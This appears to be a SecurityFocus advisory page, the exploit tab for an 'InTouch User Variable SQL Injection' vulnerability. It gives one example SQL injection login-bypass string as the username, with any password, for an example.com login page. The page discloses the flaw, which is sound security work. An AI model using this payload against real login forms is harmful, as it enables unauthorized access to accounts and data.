info
discussion
exploit
solution
references
InTouch User Variable SQL Injection Vulnerability
The following example was provided:
http://www.example.com/index.php
username: a' or 'a'='a'/*
password: anypassword
Privacy Statement
Copyright 2010, SecurityFocus
